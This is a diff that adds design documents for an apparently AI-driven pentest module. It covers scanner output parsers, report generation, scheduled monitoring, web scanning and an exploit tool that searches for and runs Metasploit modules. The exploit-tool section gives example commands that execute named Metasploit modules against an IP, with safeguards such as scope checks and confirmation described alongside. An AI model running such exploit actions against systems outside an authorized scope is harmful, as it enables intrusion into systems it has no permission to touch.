+const niktoResult = NiktoParser.parse(output, "http://target.com") +console.log(NiktoParser.format(niktoResult)) + +// Parse nuclei output +const nucleiResult = NucleiParser.parse(jsonlOutput, "https://target.com") +const findings = NucleiParser.toFindings(nucleiResult, sessionID, scanID) +``` + +--- + +## Parser Output Examples + +### Nikto Formatted Output +``` +Nikto Scan Results for http://example.com +================================================== +Host: example.com (192.168.1.1) +Port: 80 +Server: Apache/2.4.41 (Ubuntu) + +FINDINGS (3) +-------------------------------------------------- +[OSVDB-3092] /admin/ + Admin directory found - potentially sensitive + +[OSVDB-877] /backup/ + Backup directory accessible + +/config.php + PHP configuration file exposed +``` + +### Nuclei Severity Summary +``` +Nuclei Scan Results for https://example.com +================================================== + +SEVERITY SUMMARY +------------------------------ + Critical: 1 + High: 2 + Medium: 5 + Low: 3 + Info: 10 + Total: 21 + +CRITICAL (1) +-------------------------------------------------- +[cve-2021-44228] Log4Shell RCE + URL: https://example.com/api + CVE: CVE-2021-44228 +``` + +### SSLScan Analysis +``` +SSL/TLS Scan Results for example.com:443 +================================================== + +PROTOCOL SUPPORT +------------------------------ + SSL 2.0: disabled + SSL 3.0: ENABLED ⚠️ + TLS 1.0: ENABLED ⚠️ + TLS 1.1: disabled + TLS 1.2: ENABLED + TLS 1.3: ENABLED + +CIPHER SUITES +------------------------------ + Strong: 8 + Weak/Insecure: 2 + Total: 10 + + WEAK CIPHERS: + TLSv1.2 RC4-SHA (128 bits) + TLSv1.2 DES-CBC3-SHA (112 bits) +``` + +--- + +## Test Coverage + +**Test File:** `test/pentest/parsers.test.ts` + +**Results:** +``` + 25 pass + 0 fail + 72 expect() calls +``` + +**Test Categories:** + +| Parser | Tests | +|--------|-------| +| NiktoParser | 5 tests - text/JSON parsing, formatting, findings | +| NucleiParser | 4 tests - JSONL parsing, CVE extraction, summary | +| GobusterParser | 5 tests - text/JSON parsing, sensitive path detection | +| FfufParser | 5 tests - JSON parsing, formatting, findings | +| SslscanParser | 6 tests - protocol detection, cipher analysis, CVE findings | + +--- + +## Severity Classification + +Each parser implements intelligent severity classification: + +| Severity | Examples | +|----------|----------| +| Critical | RCE, SQL injection, exposed .git repos, Heartbleed | +| High | XSS, file inclusion, backup files, deprecated SSL | +| Medium | OSVDB findings, deprecated TLS, admin panels | +| Low | Information disclosure, headers, self-signed certs | +| Info | Technology detection, service identification | + +--- + +## Future Enhancements + +Potential improvements: + +1. **Additional Parsers** + - WPScan (WordPress vulnerabilities) + - SQLMap (SQL injection findings) + - Enum4linux (SMB enumeration) + - Testssl.sh (detailed TLS analysis) + +2. **Enhanced Analysis** + - CVSS score calculation + - Exploit availability lookup + - Remediation priority scoring + +3. **Output Formats** + - Export to SARIF + - Export to CSV/Excel + - HTML report generation + +--- + +## Dependencies + +| Dependency | Purpose | +|------------|---------| +| Zod | Schema validation | +| PentestTypes | Finding type definitions | +| Findings | Finding persistence | + +--- + +## Related Documentation + +- [PHASE3.md](./PHASE3.md) - Pentest Agent MVP +- [PENTEST.md](./PENTEST.md) - Pentest module reference +- [GOVERNANCE.md](./GOVERNANCE.md) - Governance system diff --git a/docs/PHASE05-report-generation.md b/docs/PHASE05-report-generation.md new file mode 100644 index 00000000000..4f2f9eaedb7 --- /dev/null +++ b/docs/PHASE05-report-generation.md @@ -0,0 +1,435 @@ +# Phase 5: Report Generation - Implementation Report + +This document describes what was implemented in Phase 5 of the cyxwiz project. + +--- + +## Overview + +Phase 5 added security assessment report generation capabilities, enabling automated creation of professional reports in Markdown, HTML, and JSON formats from collected findings. + +**Goal:** Generate comprehensive security assessment reports from findings and scan data. + +**Status:** Complete + +--- + +## Deliverables + +### 1. Report Generation System + +A complete report generation system located at `src/pentest/reports/`: + +| Component | Purpose | +|-----------|---------| +| Types | Zod schemas for report configuration and data | +| Markdown Generator | Generates styled Markdown reports | +| HTML Generator | Generates styled HTML reports with charts | +| Reports Namespace | Public API for report generation | + +### 2. Report Types + +Four report types with different focuses: + +| Type | Focus | Use Case | +|------|-------|----------| +| Executive | High-level overview | Management briefings | +| Technical | Full details with evidence | Security team review | +| Compliance | Open issues for compliance | Audit requirements | +| Full | Complete data with raw scans | Archival/reference | + +### 3. Output Formats + +Three output formats supported: + +| Format | Features | +|--------|----------| +| Markdown | Portable, version-control friendly | +| HTML | Styled, printable, includes charts | +| JSON | Machine-readable, API integration | + +--- + +## Report Sections + +### Executive Summary +- Overall risk assessment (CRITICAL, HIGH, MEDIUM, LOW, INFORMATIONAL) +- Key statistics table +- Summary paragraph based on findings + +### Methodology +- Standard assessment methodology description +- Customizable methodology text +- Tool attribution + +### Scope +- In-scope targets +- Exclusions list +- Scope description + +### Findings Summary +- Table with all findings +- Severity badges +- Status tracking + +### Detailed Findings +- Grouped by severity (Critical → Info) +- Metadata table (severity, status, target, service) +- Description and evidence +- CVE references with NVD links +- Remediation guidance + +### Remediation Summary +- Immediate Action Required (Critical/High) +- Short-Term Remediation (Medium) +- Long-Term Improvements (Low/Info) + +### Appendix +- Raw scan data (optional) +- Command history +- Scan duration/timestamps + +--- + +## Files Created + +``` +packages/opencode/src/pentest/reports/ +├── index.ts # Reports namespace and main API +├── types.ts # Zod schemas for configuration +├── markdown.ts # Markdown report generator +└── html.ts # HTML report generator with CSS + +packages/opencode/src/pentest/ +└── report-tool.ts # Agent tool for report generation + +packages/opencode/test/pentest/ +└── reports.test.ts # Report generator tests (25+ tests) +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/pentest/index.ts` | Added report exports | +| `src/tool/registry.ts` | Registered ReportTool | + +--- + +## API Reference + +### Reports Namespace + +```typescript +import { Reports } from "./pentest" + +// Generate a report +const report = await Reports.generate({ + title: "Q1 Security Assessment", + type: "technical", + format: "markdown", + organization: "Acme Corp", + assessor: "Security Team", +}, { + sessionID: "session_abc", + storage: "file", +}) + +// Write to file +await Bun.write("report.md", report.content) +``` + +### Convenience Methods + +```typescript +// Executive summary (critical/high only) +const exec = await Reports.generateExecutive({ + title: "Executive Summary", + format: "html", +}) + +// Full technical report +const tech = await Reports.generateTechnical({ + title: "Technical Report", + includeRawData: true, +}) + +// Compliance report (open issues only) +const compliance = await Reports.generateCompliance({ + title: "Compliance Report", + format: "html", +}) + +// Multiple formats at once +const reports = await Reports.generateMultiple( + { title: "Assessment Report" }, + ["markdown", "html", "json"] +) +``` + +### Configuration Options + +```typescript +interface ReportConfig { + title: string // Report title + type: "executive" | "technical" | "compliance" | "full" + format: "markdown" | "html" | "json" + organization?: string // Client/org name + assessor?: string // Tester name + dateRange?: { start: number; end: number } + scope?: { + targets: string[] + description?: string + exclusions?: string[] + } + severityFilter?: { + include?: Severity[] // Only include these + exclude?: Severity[] // Exclude these + minSeverity?: Severity // Minimum severity + } + statusFilter?: Status[] // Filter by status + includeRawData?: boolean // Include scan data + includeRemediation?: boolean // Include remediation + includeExecutiveSummary?: boolean + includeMethodology?: boolean + includeCharts?: boolean // HTML only + methodology?: string // Custom methodology text + customCss?: string // HTML custom CSS + headerContent?: string + footerContent?: string +} +``` + +--- + +## ReportTool (Agent Tool) + +The `report` tool allows the AI agent to generate reports: + +### Tool Parameters + +| Parameter | Type | Description | +|-----------|------|-------------| +| title | string | Report title | +| type | enum | executive, technical, compliance, full | +| format | enum | markdown, html, json | +| organization | string | Client name | +| assessor | string | Tester name | +| minSeverity | enum | Minimum severity filter | +| includeRawData | boolean | Include scan data | +| outputFile | string | Save to file path | + +### Example Usage + +``` +Use the report tool to generate an executive summary: +- type: executive +- format: html +- title: "Q1 2024 Assessment" +- organization: "Example Corp" +- outputFile: "/tmp/report.html" +``` + +--- + +## Output Examples + +### Markdown Report + +```markdown +# Security Assessment Report + +**Client:** Acme Corp +**Assessor:** Security Team +**Report Generated:** 1/15/2024, 2:30:00 PM +**Report ID:** report_l8x9m2_a1b2c3 + +--- + +## Executive Summary + +### Overall Risk Assessment: **CRITICAL** + +This security assessment identified **15 findings**, including **3 critical +or high severity issues** that require immediate attention. These +vulnerabilities could potentially allow unauthorized access, data breaches, +or system compromise if left unaddressed. + +### Key Statistics + +| Severity | Count | +|----------|-------| +| Critical | 1 | +| High | 2 | +| Medium | 5 | +| Low | 4 | +| Info | 3 | +| **Total** | **15** | +``` + +### HTML Report Features + +- Responsive design +- Color-coded severity badges +- Statistics cards +- Collapsible sections +- Print-friendly styles +- Chart visualization +- XSS-safe escaping + +### JSON Report Structure + +```json +{ + "config": { /* report configuration */ }, + "findings": [ /* array of findings */ ], + "scans": [ /* optional scan data */ ], + "severityStats": { + "critical": 1, + "high": 2, + "medium": 5, + "low": 4, + "info": 3, + "total": 15 + }, + "statusStats": { + "open": 12, + "confirmed": 2, + "mitigated": 1, + "false_positive": 0 + }, + "generatedAt": 1705337400000, + "reportId": "report_l8x9m2_a1b2c3" +} +``` + +--- + +## Test Coverage + +**Test File:** `test/pentest/reports.test.ts` + +**Test Categories:** + +| Category | Tests | +|----------|-------| +| Markdown Generator | 12 tests - sections, formatting, severity | +| HTML Generator | 8 tests - structure, styles, escaping | +| Report Types | 2 tests - executive vs technical | +| Remediation | 2 tests - priority grouping | + +**Test Scenarios:** +- All sections present in generated output +- Severity statistics correctly calculated +- Findings grouped by severity level +- Risk level determination (Critical → Informational) +- HTML escaping for XSS prevention +- Custom CSS injection +- Empty findings handling +- Organization/assessor metadata + +--- + +## Integration + +### With Findings System + +Reports automatically fetch findings from storage: + +```typescript +const report = await Reports.generate( + { title: "Assessment" }, + { + sessionID: "session_abc", // Filter by session + storage: "file", // Use file storage + } +) +``` + +### With Scan Data + +Include raw scan data in appendix: + +```typescript +const report = await Reports.generate({ + title: "Full Report", + type: "full", + includeRawData: true, // Includes scan commands/output +}) +``` + +### Severity Filtering + +Filter findings by severity: + +```typescript +// Executive: only high severity and above +const exec = await Reports.generateExecutive({ title: "Exec" }) + +// Custom filter +const report = await Reports.generate({ + title: "Critical Issues", + severityFilter: { + minSeverity: "critical", + }, +}) +``` + +--- + +## Severity Badge Reference + +| Severity | Markdown | HTML Class | +|----------|----------|------------| +| Critical | :red_circle: Critical | `severity-critical` | +| High | :orange_circle: High | `severity-high` | +| Medium | :yellow_circle: Medium | `severity-medium` | +| Low | :green_circle: Low | `severity-low` | +| Info | :blue_circle: Info | `severity-info` | + +--- + +## Future Enhancements + +Potential improvements: + +1. **Additional Formats** + - PDF generation (via headless browser) + - DOCX export + - SARIF for IDE integration + +2. **Enhanced Charts** + - Trend analysis over time + - Category breakdown + - CVSS distribution + +3. **Templates** + - Custom report templates + - Company branding + - Multi-language support + +4. **Collaboration** + - Report versioning + - Collaborative editing + - Comment system + +--- + +## Dependencies + +| Dependency | Purpose | +|------------|---------| +| Zod | Schema validation | +| PentestTypes | Finding type definitions | +| Findings | Finding retrieval | +| Tool | Agent tool framework | +| Log | Structured logging | + +--- + +## Related Documentation + +- [PHASE4.md](./PHASE4.md) - Multi-Tool Parsers +- [PHASE3.md](./PHASE3.md) - Pentest Agent MVP +- [PENTEST.md](./PENTEST.md) - Pentest module reference +- [GOVERNANCE.md](./GOVERNANCE.md) - Governance system diff --git a/docs/PHASE06-continuous-monitoring.md b/docs/PHASE06-continuous-monitoring.md new file mode 100644 index 00000000000..c530718efa4 --- /dev/null +++ b/docs/PHASE06-continuous-monitoring.md @@ -0,0 +1,381 @@ +# Phase 6: Continuous Monitoring - Implementation Report + +This document describes what was implemented in Phase 6 of the cyxwiz project. + +--- + +## Overview + +Phase 6 added continuous monitoring capabilities, enabling scheduled security scans with diff detection and alerting for new vulnerabilities. + +**Goal:** Automate recurring security scans and alert when new issues are discovered. + +**Status:** Complete + +--- + +## Features + +1. **Scheduled Scans**: Run security tools on interval or cron schedules +2. **Diff Detection**: Compare findings between runs, identify new/resolved issues +3. **Alerting**: Publish events when new vulnerabilities are discovered +4. **Multi-Tool Support**: Run any combination of nmap, nuclei, nikto, etc. + +--- + +## Module Structure + +``` +src/pentest/monitoring/ +├── index.ts # Main exports +├── types.ts # Zod schemas (Monitor, MonitorRun, Schedule) +├── events.ts # BusEvent definitions (12 events) +├── scheduler.ts # Timer-based scheduler with Instance state +├── cron-parser.ts # Lightweight cron expression parser +├── runner.ts # Monitor execution and tool invocation +├── diff.ts # Finding fingerprinting and comparison +├── alerter.ts # Alert handling (bus, log, webhook) +├── storage.ts # Monitor and run persistence +└── tool.ts # MonitorTool for agent interaction +``` + +--- + +## Data Models + +### Monitor + +```typescript +{ + id: string // Unique ID (mon_xxx) + name: string // Human-readable name + description?: string + sessionID: string // Parent session + targets: string[] // IPs, hostnames, URLs + tools: MonitorToolConfig[] // Tools to run + schedule: Schedule // Interval or cron + status: MonitorStatus // active, paused, disabled, error + alerts: AlertConfig // Alert settings + createdAt: number + lastRunAt?: number + nextRunAt?: number + runCount: number +} +``` + +### MonitorRun + +```typescript +{ + id: string // Unique ID (run_xxx) + monitorID: string + sessionID: string + startTime: number + endTime?: number + status: MonitorRunStatus // running, completed, failed, cancelled + scanIDs: string[] // Scans created + findingIDs: string[] // Findings created + newFindingIDs: string[] // New since last run + resolvedFindingIDs: string[] // Gone since last run + runNumber: number +} +``` + +### Schedule Types + +```typescript +// Interval-based (e.g., every hour) +{ type: "interval", intervalMs: 3600000, maxRuns?: 0 } + +// Cron-based (e.g., daily at 2 AM) +{ type: "cron", expression: "0 2 * * *", timezone?: string } +``` + +--- + +## Key Components + +### 1. Scheduler (`scheduler.ts`) + +- Uses native `setTimeout` with `.unref()` (no external dependencies) +- Instance-scoped state via `Instance.state()` +- Prevents concurrent runs of the same monitor +- Auto-reschedules after completion +- Supports max runs limit for interval schedules + +### 2. Cron Parser (`cron-parser.ts`) + +- Parses standard 5-field cron expressions: `minute hour dayOfMonth month dayOfWeek` +- Supports: wildcards (`*`), ranges (`1-5`), steps (`*/5`), lists (`1,3,5`) +- Calculates next run time +- Validates expressions +- Provides human-readable descriptions + +### 3. Diff Engine (`diff.ts`) + +- Fingerprints findings by: title (normalized), target (normalized), port, service, severity +- Uses SHA-256 hash for comparison +- Identifies: new, resolved, unchanged findings between runs +- Filters by minimum severity + +### 4. Alerter (`alerter.ts`) + +- Channels: bus (events), log (structured), webhook (HTTP POST) +- Severity filtering (alert only on high+ severity, etc.) +- Cooldown to prevent alert spam (default: 5 minutes) +- Webhook payload includes full finding details + +### 5. Monitor Runner (`runner.ts`) + +- Invokes existing tools (NmapTool, SecToolsTool) +- Creates minimal tool context for auto-approval +- Collects findings per run +- Performs diff against previous run +- Triggers alerts based on configuration + +--- + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.monitor.scheduled` | Monitor scheduled for next execution | +| `pentest.monitor.run_started` | Run began | +| `pentest.monitor.run_completed` | Run finished with statistics | +| `pentest.monitor.run_failed` | Run failed with error | +| `pentest.monitor.paused` | Monitor was paused | +| `pentest.monitor.resumed` | Monitor was resumed | +| `pentest.monitor.cancelled` | Monitor was cancelled | +| `pentest.monitor.created` | New monitor created | +| `pentest.monitor.updated` | Monitor configuration changed | +| `pentest.monitor.deleted` | Monitor was deleted | +| `pentest.monitor.alert.new_vulnerabilities` | New findings detected | +| `pentest.monitor.alert.resolved` | Findings resolved | + +--- + +## MonitorTool Actions + +| Action | Description | +|--------|-------------| +| `create` | Create a new monitor with targets, tools, schedule | +| `list` | List all monitors with status | +| `get` | Get detailed monitor info and recent runs | +| `pause` | Pause a running monitor | +| `resume` | Resume a paused monitor | +| `delete` | Delete a monitor | +| `trigger` | Trigger an immediate scan | +| `status` | Get scheduler status (running, scheduled) | + +--- + +## Files Created + +``` +packages/opencode/src/pentest/monitoring/ +├── types.ts # 11 Zod schemas +├── events.ts # 12 BusEvent definitions +├── scheduler.ts # Scheduler with Instance state +├── cron-parser.ts # Cron expression parser +├── runner.ts # Monitor execution +├── diff.ts # Finding comparison +├── alerter.ts # Alert channels +├── storage.ts # Monitor/run persistence +├── tool.ts # MonitorTool for agents +└── index.ts # Module exports + +packages/opencode/test/pentest/ +└── monitoring.test.ts # 25+ tests +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/pentest/index.ts` | Added monitoring exports | +| `src/tool/registry.ts` | Registered MonitorTool | + +--- + +## Usage Examples + +### Create a Monitor (Agent Tool) + +``` +action="create" +name="Daily Security Scan" +targets=["192.168.1.0/24", "https://app.example.com"] +tools=[ + { tool: "nmap", args: "-sV" }, + { tool: "nuclei", args: "-t cves/" } +] +scheduleType="cron" +cronExpression="0 2 * * *" +alertMinSeverity="medium" +``` + +### Programmatic Usage + +```typescript +import { createMonitor, Scheduler, MonitoringEvents } from "./pentest/monitoring" +import { Bus } from "./bus" + +// Create a monitor +const monitor = await createMonitor({ + name: "Hourly Port Scan", + sessionID: ctx.sessionID, + targets: ["10.0.0.1"], + tools: [{ tool: "nmap", createFindings: true }], + schedule: { type: "interval", intervalMs: 3600000 }, + alerts: { + enabled: true, + minSeverity: "high", + channels: ["bus", "webhook"], + webhookUrl: "https://slack.example.com/webhook", + }, +}) + +// Schedule it +await Scheduler.scheduleMonitor(monitor) + +// Subscribe to alerts +Bus.subscribe(MonitoringEvents.NewVulnerabilitiesDetected, (event) => { + console.log(`New vulnerabilities: ${event.summary.total}`) + console.log(`Critical: ${event.summary.critical}`) +}) +``` + +### Trigger Immediate Scan + +```typescript +const run = await Scheduler.triggerNow(monitorID) +console.log(`Found ${run.findingIDs.length} findings`) +console.log(`New: ${run.newFindingIDs.length}`) +console.log(`Resolved: ${run.resolvedFindingIDs.length}`) +``` + +--- + +## Storage Layout + +``` +pentest/monitoring/ + monitors/ + mon_abc123.json # Monitor configuration + mon_def456.json + runs/ + mon_abc123/ + run_xyz789.json # Run record with finding lists + run_uvw012.json +``` + +--- + +## Cron Expression Reference + +| Expression | Description | +|------------|-------------| +| `* * * * *` | Every minute | +| `0 * * * *` | Every hour | +| `0 0 * * *` | Daily at midnight | +| `0 2 * * *` | Daily at 2 AM | +| `0 */6 * * *` | Every 6 hours | +| `0 9-17 * * 1-5` | Hourly 9-5 on weekdays | +| `*/15 * * * *` | Every 15 minutes | +| `0 0 1 * *` | Monthly on the 1st | + +--- + +## Test Coverage + +**Test File:** `test/pentest/monitoring.test.ts` + +**Test Categories:** + +| Category | Tests | +|----------|-------| +| CronParser.parse | 7 tests - wildcards, values, ranges, steps, lists | +| CronParser.nextRun | 4 tests - next minute, hour, midnight, specific | +| CronParser.validate | 2 tests - valid/invalid expressions | +| CronParser.describe | 1 test - human-readable descriptions | +| DiffEngine.fingerprint | 4 tests - consistency, normalization | +| DiffEngine.compare | 6 tests - new, resolved, unchanged, mixed | +| DiffEngine.summarizeSeverity | 2 tests - counts, empty | +| DiffEngine.filterBySeverity | 1 test - minimum severity | + +--- + +## Alert Webhook Payload + +```json +{ + "type": "new_vulnerabilities", + "monitor": { + "id": "mon_abc123", + "name": "Daily Security Scan" + }, + "run": { + "id": "run_xyz789", + "number": 5 + }, + "findings": [ + { + "id": "finding_123", + "title": "SQL Injection in login form", + "severity": "critical", + "target": "https://app.example.com", + "port": 443 + } + ], + "summary": { + "critical": 1, + "high": 2, + "medium": 3, + "low": 0, + "info": 0, + "total": 6 + }, + "timestamp": 1705337400000 +} +``` + +--- + +## Dependencies + +- No external packages required +- Uses existing: Storage, Bus, NmapTool, SecToolsTool, Findings +- Native Node.js/Bun: setTimeout, crypto (SHA-256) + +--- + +## Future Enhancements + +1. **Advanced Scheduling** + - Timezone support for cron + - Schedule exceptions (skip holidays) + - Maintenance windows + +2. **Alert Channels** + - Email notifications + - Slack integration + - PagerDuty integration + +3. **Dashboard** + - Monitor status overview + - Trend graphs + - Alert history + +4. **Comparison Features** + - Cross-monitor diff + - Historical trend analysis + - Baseline comparisons + +--- + +## Related Documentation + +- [PHASE5.md](./PHASE5.md) - Report Generation +- [PHASE4.md](./PHASE4.md) - Multi-Tool Parsers +- [PHASE3.md](./PHASE3.md) - Pentest Agent MVP +- [PENTEST.md](./PENTEST.md) - Pentest module reference diff --git a/docs/PHASE07-exploit-framework.md b/docs/PHASE07-exploit-framework.md new file mode 100644 index 00000000000..1687328eb1b --- /dev/null +++ b/docs/PHASE07-exploit-framework.md @@ -0,0 +1,388 @@ +# Phase 7: Exploit Framework Integration - Implementation Report + +This document describes what was implemented in Phase 7 of the cyxwiz project. + +--- + +## Overview + +Phase 7 added exploit framework integration, enabling exploit search, matching, and safe execution with searchsploit and metasploit. + +**Goal:** Enable automated exploit matching for findings with comprehensive safety controls. + +**Status:** Complete + +--- + +## Features + +1. **Searchsploit Integration**: Parse Exploit-DB output, match by CVE/service +2. **Metasploit Integration**: Search MSF modules, get info, run checks +3. **Exploit Matching**: Auto-suggest exploits based on findings +4. **Safe Execution**: Dry-run default, mandatory confirmation, scope validation + +--- + +## Module Structure + +``` +src/pentest/exploits/ +├── index.ts # Module exports +├── types.ts # Zod schemas (12 types) +├── events.ts # BusEvent definitions (7 events) +├── matcher.ts # ExploitMatcher service +├── storage.ts # Match/execution persistence +├── tool.ts # ExploitTool for agent +└── parsers/ + ├── index.ts # Parser exports + ├── searchsploit.ts # Searchsploit output parser + └── metasploit.ts # MSF output parser +``` + +--- + +## Data Models + +### ExploitMatch + +```typescript +{ + id: string // Unique ID (match_xxx) + findingID: string // Associated finding + source: ExploitSource // exploit-db, metasploit, etc. + exploitID: string // EDB-ID or MSF module path + title: string // Exploit title + description?: string + type?: ExploitType // remote, local, webapps, etc. + rank?: ExploitRank // excellent, great, good, etc. + confidence: Confidence // high, medium, low + matchReason: string // Why this exploit matches + cve?: string[] // Associated CVEs + url?: string // Exploit-DB URL + path?: string // Local file path + status: MatchStatus // suggested, verified, tested, dismissed + createdAt: number + verifiedAt?: number +} +``` + +### SearchsploitEntry + +```typescript +{ + id: string // EDB-ID + title: string // Exploit title + path: string // Local file path + date?: string // Publication date + author?: string + type?: ExploitType + platform?: Platform + port?: number + cve?: string[] + verified?: boolean // Exploit-DB verified +} +``` + +### MetasploitModule + +```typescript +{ + name: string // Full module path + fullname?: string // Human-readable name + type: ExploitType + rank?: ExploitRank + disclosure_date?: string + description?: string + author?: string[] + references?: string[] + cve?: string[] + platforms?: Platform[] + options?: ModuleOption[] + check?: boolean // Has check method + privileged?: boolean +} +``` + +--- + +## Key Components + +### 1. SearchsploitParser (`parsers/searchsploit.ts`) + +- Parses JSON output from `searchsploit -j` +- Falls back to text parsing for plain output +- Extracts CVEs from codes and titles +- Maps platform and exploit type + +### 2. MetasploitParser (`parsers/metasploit.ts`) + +- Parses msfconsole search output +- Extracts module info from `info` command +- Maps module types (exploit, auxiliary, post, etc.) +- Maps rank (excellent, great, good, etc.) + +### 3. ExploitMatcher (`matcher.ts`) + +- Builds search queries from findings (CVE, service, version) +- Searches both searchsploit and metasploit +- Deduplicates by exploitID +- Ranks matches by confidence, MSF rank, CVE count + +### 4. ExploitStorage (`storage.ts`) + +- Saves and retrieves exploit matches +- Supports file and memory storage modes +- Saves execution results for audit +- Filters by findingID, source, status + +### 5. ExploitTool (`tool.ts`) + +- Agent-facing tool for exploit operations +- Actions: search, suggest, info, check, execute, list +- Scope validation via governance +- Dry-run default for execution +- Never auto-approves exploit commands + +--- + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.exploit.search_completed` | Search finished | +| `pentest.exploit.suggestions_generated` | Matches found for finding | +| `pentest.exploit.match_updated` | Match status changed | +| `pentest.exploit.check_executed` | Check ran | +| `pentest.exploit.execution_dry_run` | Dry run performed | +| `pentest.exploit.execution_completed` | Real execution completed | +| `pentest.exploit.execution_failed` | Execution failed | + +--- + +## ExploitTool Actions + +| Action | Description | +|--------|-------------| +| `search` | Search exploit databases by keyword/CVE | +| `suggest` | Auto-suggest exploits for a finding | +| `info` | Get detailed module information | +| `check` | Run exploit check (verify without exploit) | +| `execute` | Execute exploit (dry-run default, requires confirmation) | +| `list` | List saved exploit matches | + +--- + +## Safety Requirements + +1. **Scope Validation**: All targets checked against GovernanceScope before any operation +2. **Permission System**: All commands go through ctx.ask() for user confirmation +3. **Dry-Run Default**: execute action defaults to dryRun=true +4. **Never Auto-Approve**: Exploit commands use `always: []` to prevent auto-approval +5. **Audit Trail**: All operations publish events and save execution results + +--- + +## Files Created + +``` +packages/opencode/src/pentest/exploits/ +├── types.ts # 12 Zod schemas +├── events.ts # 7 BusEvent definitions +├── matcher.ts # Exploit matching service +├── storage.ts # Match/execution persistence +├── tool.ts # ExploitTool for agents +├── index.ts # Module exports +└── parsers/ + ├── index.ts # Parser exports + ├── searchsploit.ts # Searchsploit parser + └── metasploit.ts # Metasploit parser + +packages/opencode/test/pentest/ +└── exploits.test.ts # 30+ tests +``` + +## Files Modified + +| File | Changes | +|------|---------| +| `src/pentest/index.ts` | Added exploit exports | +| `src/tool/registry.ts` | Registered ExploitTool | + +--- + +## Usage Examples + +### Search for Exploits (Agent Tool) + +``` +action="search" +query="apache 2.4" +source="both" +``` + +### Suggest Exploits for Finding + +``` +action="suggest" +findingID="finding_abc123" +``` + +### Get Module Info + +``` +action="info" +module="exploit/multi/http/apache_mod_cgi_bash_env_exec" +``` + +### Run Vulnerability Check + +``` +action="check" +module="exploit/linux/http/apache_path_traversal_rce" +target="192.168.1.1" +``` + +### Execute Exploit (Dry Run) + +``` +action="execute" +module="exploit/linux/http/apache_path_traversal_rce" +target="192.168.1.1" +dryRun=true +``` + +### Execute Exploit (Real) + +``` +action="execute" +module="exploit/linux/http/apache_path_traversal_rce" +target="192.168.1.1" +dryRun=false +options={"RPORT": 8080} +``` + +### Programmatic Usage + +```typescript +import { ExploitMatcher, ExploitStorage, ExploitEvents } from "./pentest/exploits" +import { Bus } from "./bus" + +// Match finding to exploits +const matches = await ExploitMatcher.matchFinding(finding, { + searchsploit: true, + metasploit: true, + limit: 10, +}) + +// Rank matches +const ranked = ExploitMatcher.rankMatches(matches) + +// Save matches +for (const match of ranked) { + await ExploitStorage.saveMatch(match) +} + +// Subscribe to events +Bus.subscribe(ExploitEvents.SuggestionsGenerated, (event) => { + console.log(`Found ${event.matchCount} exploits for ${event.findingID}`) +}) +``` + +--- + +## Storage Layout + +``` +pentest/exploits/ + matches/ + match_abc123.json # Exploit match records + executions/ + exec_xyz789.json # Execution audit records +``` + +--- + +## Matching Algorithm + +1. **CVE Matching (High Confidence)** + - Extract CVEs from finding + - Search both databases by CVE ID + - Mark matches as "high" confidence + +2. **Service/Version Matching (Medium Confidence)** + - Extract service name from finding + - Extract version from evidence field + - Map port to common service names + - Search by combined queries + +3. **Deduplication** + - Key by `source:exploitID` + - Keep first occurrence + +4. **Ranking** + - Sort by confidence (high > medium > low) + - Then by MSF rank (excellent > great > good > normal > average > low) + - Then by CVE count (more is better) + +--- + +## Test Coverage + +**Test File:** `test/pentest/exploits.test.ts` + +**Test Categories:** + +| Category | Tests | +|----------|-------| +| SearchsploitParser.parse | 3 tests - JSON, text, CVE extraction | +| SearchsploitParser.format | 2 tests - formatting, empty results | +| SearchsploitParser.toMatches | 1 test - match generation | +| MetasploitParser.parseSearch | 3 tests - parsing, CVE, auxiliary | +| MetasploitParser.format | 1 test - formatting | +| MetasploitParser.toMatches | 1 test - match generation | +| ExploitTypes schemas | 4 tests - validation | +| ExploitStorage | 8 tests - CRUD, filtering | +| ExploitMatcher.buildQueries | 3 tests - service, port, version | +| ExploitMatcher.rankMatches | 3 tests - confidence, rank, CVE | + +--- + +## Dependencies + +- No external packages required +- Uses existing: Storage, Bus, Findings, GovernanceScope, GovernanceMatcher +- CLI tools: searchsploit, msfconsole (must be installed) + +--- + +## Future Enhancements + +1. **Additional Sources** + - GitHub POC repositories + - Nuclei templates + - PacketStorm + - CVE Details + +2. **Enhanced Matching** + - Version range matching + - Platform-aware suggestions + - Exploit chain detection + +3. **Execution Features** + - Session management + - Payload customization + - Post-exploitation modules + +4. **Reporting** + - Exploit verification reports + - Attack path visualization + - Timeline of exploitation attempts + +--- + +## Related Documentation + +- [PHASE6.md](./PHASE6.md) - Continuous Monitoring +- [PHASE5.md](./PHASE5.md) - Report Generation +- [PHASE4.md](./PHASE4.md) - Multi-Tool Parsers +- [PENTEST.md](./PENTEST.md) - Pentest module reference diff --git a/docs/PHASE08-web-app-scanner.md b/docs/PHASE08-web-app-scanner.md new file mode 100644 index 00000000000..61667efb976 --- /dev/null +++ b/docs/PHASE08-web-app-scanner.md @@ -0,0 +1,418 @@ +# Phase 8: Web Application Scanner - Implementation Report + +This document describes what was implemented in Phase 8 of the cyxwiz project. + +--- + +## Overview + +Phase 8 added comprehensive web application scanning capabilities, including crawling, multi-tool orchestration, and OWASP categorization. + +**Goal:** Enable automated web application security scanning with coordinated tool execution. + +**Status:** Complete + +--- + +## Features + +1. **Web Crawler**: Discover URLs and forms using native fetch() with regex-based extraction +2. **Scan Orchestration**: Coordinate multiple security tools with pre-defined profiles +3. **OWASP Top 10 2021**: Categorize findings by OWASP Top 10 categories +4. **New Parsers**: WPScanParser and WhatWebParser for WordPress/fingerprinting + +--- + +## Module Structure + +``` +src/pentest/webscan/ +├── index.ts # Module exports +├── types.ts # Zod schemas (20+ types) +├── events.ts # BusEvent definitions (9 events) +├── crawler.ts # Web crawler with regex extraction +├── orchestrator.ts # Scan orchestration service +├── profiles.ts # Pre-defined scan profiles +├── storage.ts # Crawl/scan persistence +├── owasp.ts # OWASP categorization +├── tool.ts # WebScanTool for agent +└── parsers/ + ├── index.ts # Parser exports + ├── wpscan.ts # WPScan JSON parser + └── whatweb.ts # WhatWeb JSON parser +``` + +--- + +## Data Models + +### CrawlResult + +```typescript +{ + id: string + target: string // Base URL + urls: DiscoveredUrl[] // All discovered URLs + forms: DiscoveredForm[] // All discovered forms + stats: { + urlsDiscovered: number + urlsVisited: number + formsDiscovered: number + maxDepthReached: number + errorCount: number + duration: number + } + options: CrawlOptions + startedAt: number + completedAt?: number + status: Status // pending, running, completed, 